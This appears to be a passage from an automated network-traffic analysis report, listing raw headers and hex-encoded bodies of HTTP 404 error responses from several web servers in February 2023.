3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 13 Feb 2023 18:04:31 GMTserver: LiteSpeedData Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 13 Feb 2023 18:04:34 GMTserver: LiteSpeedData Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:04:50 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:04:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 13 Feb 2023 18:04:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Mon, 13 Feb 2023 18:04:58 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:05:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 17388Connection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 